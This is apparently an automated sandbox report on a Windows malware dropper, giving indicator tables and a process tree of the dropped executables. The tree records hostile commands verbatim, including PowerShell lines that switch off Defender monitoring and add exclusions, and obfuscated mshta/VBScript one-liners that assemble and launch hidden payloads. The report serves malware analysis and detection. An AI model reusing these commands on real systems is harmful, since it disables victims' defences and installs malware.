Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	124	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe
368	CrowdInspect64.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3020	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4936	Sat14a7594cc5a0116.exe
6136	Sat14a7594cc5a0116.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2760	MicrosoftEdge.exe
Token: SeDebugPrivilege	2760	MicrosoftEdge.exe
Token: SeDebugPrivilege	2760	MicrosoftEdge.exe
Token: SeDebugPrivilege	2760	MicrosoftEdge.exe
Token: SeDebugPrivilege	2760	MicrosoftEdge.exe
Token: SeDebugPrivilege	1492	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	1492	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	1492	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	1492	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe
Token: SeDebugPrivilege	368	CrowdInspect64.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1184	Sat1481f5a7e3eccdd.tmp

Suspicious use of SetWindowsHookEx 32 IoCs

pid	Process
4300	ha.exe
4300	ha.exe
368	CrowdInspect64.exe
2760	MicrosoftEdge.exe
2304	MicrosoftEdgeCP.exe
2304	MicrosoftEdgeCP.exe
948	setup_x86_x64_install.exe
2464	setup_installer.exe
2816	setup_install.exe
4636	Sat14514904a4b.exe
4052	Sat142ac5249376e895.exe
8	Sat142b09ae40c44cf.exe
4300	Sat14b47e86b9c16b.exe
3416	Sat1481f5a7e3eccdd.exe
1164	Sat1481f5a7e3eccdd.tmp
680	Sat1481f5a7e3eccdd.exe
1184	Sat1481f5a7e3eccdd.tmp
1552	inst1.exe
5056	search_hyperfs_206.exe
2236	postback.exe
744	setup.exe
3204	cmd.exe
2508	setup_x86_x64_install.exe
5264	Calculator.exe
5556	setup_install.exe
4368	WerFault.exe
2780	Sat14514904a4b.exe
5452	Sat1481f5a7e3eccdd.tmp
5432	Sat1481f5a7e3eccdd.exe
5740	Sat1481f5a7e3eccdd.tmp
5920	WerFault.exe
5476	aXhWwRlFiTz_d9ZgGw_y44PI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 948 wrote to memory of 2464	948	setup_x86_x64_install.exe	81
PID 948 wrote to memory of 2464	948	setup_x86_x64_install.exe	81
PID 948 wrote to memory of 2464	948	setup_x86_x64_install.exe	81
PID 2464 wrote to memory of 2816	2464	setup_installer.exe	82
PID 2464 wrote to memory of 2816	2464	setup_installer.exe	82
PID 2464 wrote to memory of 2816	2464	setup_installer.exe	82
PID 2816 wrote to memory of 2580	2816	setup_install.exe	84
PID 2816 wrote to memory of 2580	2816	setup_install.exe	84
PID 2816 wrote to memory of 2580	2816	setup_install.exe	84
PID 2816 wrote to memory of 2356	2816	setup_install.exe	85
PID 2816 wrote to memory of 2356	2816	setup_install.exe	85
PID 2816 wrote to memory of 2356	2816	setup_install.exe	85
PID 2356 wrote to memory of 4068	2356	cmd.exe	86
PID 2356 wrote to memory of 4068	2356	cmd.exe	86
PID 2356 wrote to memory of 4068	2356	cmd.exe	86
PID 2816 wrote to memory of 4384	2816	setup_install.exe	87
PID 2816 wrote to memory of 4384	2816	setup_install.exe	87
PID 2816 wrote to memory of 4384	2816	setup_install.exe	87
PID 2816 wrote to memory of 3592	2816	setup_install.exe	88
PID 2816 wrote to memory of 3592	2816	setup_install.exe	88
PID 2816 wrote to memory of 3592	2816	setup_install.exe	88
PID 2816 wrote to memory of 1012	2816	setup_install.exe	89
PID 2816 wrote to memory of 1012	2816	setup_install.exe	89
PID 2816 wrote to memory of 1012	2816	setup_install.exe	89
PID 2816 wrote to memory of 4920	2816	setup_install.exe	90
PID 2816 wrote to memory of 4920	2816	setup_install.exe	90
PID 2816 wrote to memory of 4920	2816	setup_install.exe	90
PID 2816 wrote to memory of 688	2816	setup_install.exe	91
PID 2816 wrote to memory of 688	2816	setup_install.exe	91
PID 2816 wrote to memory of 688	2816	setup_install.exe	91
PID 2580 wrote to memory of 2240	2580	cmd.exe	114
PID 2580 wrote to memory of 2240	2580	cmd.exe	114
PID 2580 wrote to memory of 2240	2580	cmd.exe	114
PID 2816 wrote to memory of 828	2816	setup_install.exe	113
PID 2816 wrote to memory of 828	2816	setup_install.exe	113
PID 2816 wrote to memory of 828	2816	setup_install.exe	113
PID 4920 wrote to memory of 1772	4920	cmd.exe	92
PID 4920 wrote to memory of 1772	4920	cmd.exe	92
PID 2816 wrote to memory of 1292	2816	setup_install.exe	93
PID 2816 wrote to memory of 1292	2816	setup_install.exe	93
PID 2816 wrote to memory of 1292	2816	setup_install.exe	93
PID 2816 wrote to memory of 3052	2816	setup_install.exe	112
PID 2816 wrote to memory of 3052	2816	setup_install.exe	112
PID 2816 wrote to memory of 3052	2816	setup_install.exe	112
PID 2816 wrote to memory of 4652	2816	setup_install.exe	94
PID 2816 wrote to memory of 4652	2816	setup_install.exe	94
PID 2816 wrote to memory of 4652	2816	setup_install.exe	94
PID 4384 wrote to memory of 3192	4384	cmd.exe	111
PID 4384 wrote to memory of 3192	4384	cmd.exe	111
PID 2816 wrote to memory of 3204	2816	setup_install.exe	140
PID 2816 wrote to memory of 3204	2816	setup_install.exe	140
PID 2816 wrote to memory of 3204	2816	setup_install.exe	140
PID 2816 wrote to memory of 3272	2816	setup_install.exe	96
PID 2816 wrote to memory of 3272	2816	setup_install.exe	96
PID 2816 wrote to memory of 3272	2816	setup_install.exe	96
PID 2816 wrote to memory of 508	2816	setup_install.exe	101
PID 2816 wrote to memory of 508	2816	setup_install.exe	101
PID 2816 wrote to memory of 508	2816	setup_install.exe	101
PID 3592 wrote to memory of 8	3592	cmd.exe	100
PID 3592 wrote to memory of 8	3592	cmd.exe	100
PID 3592 wrote to memory of 8	3592	cmd.exe	100
PID 688 wrote to memory of 1732	688	cmd.exe	97
PID 688 wrote to memory of 1732	688	cmd.exe	97
PID 688 wrote to memory of 1732	688	cmd.exe	97

C:\Users\Admin\AppData\Local\Temp\ha.exe
"C:\Users\Admin\AppData\Local\Temp\ha.exe"
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4300

C:\Users\Admin\Desktop\CrowdInspect64.exe
"C:\Users\Admin\Desktop\CrowdInspect64.exe"
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:368

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2760

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4124

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2304

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1492

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Новый текстовый документ.txt
1⤵
PID:3232

C:\Users\Admin\Desktop\setup_x86_x64_install.exe
"C:\Users\Admin\Desktop\setup_x86_x64_install.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:948
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2464
- - C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2816
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2580
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        5⤵
        
        PID:2240
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2356
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:4068
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4384
    - - C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat14f1396dfcf191bd.exe
        
        Sat14f1396dfcf191bd.exe
        5⤵
        Executes dropped EXE
        
        PID:3192
      - C:\Users\Admin\AppData\Roaming\6661930.exe
        
        "C:\Users\Admin\AppData\Roaming\6661930.exe"
        6⤵
        Executes dropped EXE
        
        PID:2020
      - C:\Users\Admin\AppData\Roaming\6377462.exe
        
        "C:\Users\Admin\AppData\Roaming\6377462.exe"
        6⤵
        Executes dropped EXE
        
        PID:4952
      - C:\Users\Admin\AppData\Roaming\8701109.exe
        
        "C:\Users\Admin\AppData\Roaming\8701109.exe"
        6⤵
        Executes dropped EXE
        
        PID:4956
      - C:\Users\Admin\AppData\Roaming\4661793.exe
        
        "C:\Users\Admin\AppData\Roaming\4661793.exe"
        6⤵
        
        PID:4368
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        
        PID:3280
      - C:\Users\Admin\AppData\Roaming\4818869.exe
        
        "C:\Users\Admin\AppData\Roaming\4818869.exe"
        6⤵
        Executes dropped EXE
        
        PID:1744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3592
    - - C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat142b09ae40c44cf.exe
        
        Sat142b09ae40c44cf.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:8
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject( "wscRiPT.sHELl" ). rUN( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY &If """" =="""" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )
        6⤵
        
        PID:4440
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY &If "" =="" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat142b09ae40c44cf.exe") do taskkill -iM "%~NXf" /f
        7⤵
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE
        
        JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY
        8⤵
        Executes dropped EXE
        
        PID:4600
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject( "wscRiPT.sHELl" ). rUN( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY &If ""/p~P_UpSUZjMkOKsY "" =="""" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )
        9⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY &If "/p~P_UpSUZjMkOKsY " =="" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE") do taskkill -iM "%~NXf" /f
        10⤵
        
        PID:4496
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCriPT:CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run("CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q+ 9h1gI_nY.T+ 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE) )
        9⤵
        
        PID:5684
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk>1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 +lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q+9h1gI_nY.T+ 1HSQZ.62D 2KSA.Gf7 &STaRT msiexec -y .\2KSA.GF7
        10⤵
        
        PID:6076
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ecHO "
        11⤵
        
        PID:4820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"
        11⤵
        
        PID:508
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -y .\2KSA.GF7
        11⤵
        
        PID:6540
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -iM "Sat142b09ae40c44cf.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:4312
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe
      4⤵
      PID:1012
    - - C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat14514904a4b.exe
        
        Sat14514904a4b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4636
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4920
    - - C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat14d32a38896785b13.exe
        
        Sat14d32a38896785b13.exe
        5⤵
        Executes dropped EXE
        
        PID:1772
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:2392
        
        C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"
        7⤵
        
        PID:4204
        
        C:\Users\Admin\AppData\Local\Temp\inst1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1552
        
        C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
        7⤵
        Executes dropped EXE
        
        PID:2528
        
        C:\Users\Admin\AppData\Local\Temp\4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4.exe"
        7⤵
        Executes dropped EXE
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        Executes dropped EXE
        
        PID:5940
        
        C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe"
        7⤵
        Executes dropped EXE
        
        PID:740
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 740 -s 1536
        8⤵
        Program crash
        
        PID:5436
        
        C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
        
        "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5056
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        8⤵
        
        PID:4580
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
        9⤵
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
        
        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
        10⤵
        Executes dropped EXE
        
        PID:5416
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        11⤵
        
        PID:5972
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
        12⤵
        
        PID:1212
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
        11⤵
        
        PID:6284
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
        12⤵
        
        PID:5332
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
        13⤵
        
        PID:5788
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
        13⤵
        
        PID:936
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -Y ..\lXQ2g.WC
        13⤵
        
        PID:5632
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "search_hyperfs_206.exe"
        10⤵
        Kills process with taskkill
        
        PID:5888
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:744
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 808
        8⤵
        Program crash
        
        PID:2748
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 840
        8⤵
        Program crash
        
        PID:3464
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 908
        8⤵
        Program crash
        
        PID:5192
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 884
        8⤵
